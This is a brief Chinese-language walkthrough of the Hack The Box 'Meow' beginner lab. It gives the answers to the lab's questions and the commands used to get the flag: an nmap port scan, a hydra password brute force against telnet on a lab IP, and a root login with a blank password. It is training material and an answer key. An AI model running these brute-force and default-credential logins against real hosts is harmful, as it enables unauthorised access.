Hack The Box :: Starting Point - Meow
一些名词,比较简单
TASK 1 What does the acronym VM stand for?
Virtual Machine
TASK 2 What tool do we use to interact with the operating system in order to issue commands via the command line, such as the one to start our VPN connection? It’s also known as a console or shell.
terminal
TASK 3 What service do we use to form our VPN connection into HTB labs?
openvpn
Task 4 What is the abbreviated name for a ‘tunnel interface’ in the output of your VPN boot-up sequence output?
tun
Task 5 What tool do we use to test our connection to the target with an ICMP echo request?
ping
Task 6 What is the name of the most common tool for finding open ports on a target?
nmap
Task 7 What service do we identify on port 23/tcp during our scans?
telnet
Task 8 What username is able to log into the target over telnet with a blank password?
root
获取flag
nmap 检测 IP 发现 开放 23端口
nmap ip --open
简单的弱密码测试
hydra -L /usr/share/wordlists/metasploit/http_default_users.txt -e nsr telnet://10.129.40.120
这样的结果表名 用户名是 root 密码为 空
使用telnet 登陆并查看flag
telnet 10.129.40.120
root # 登陆用户
ls
cat flag.txt









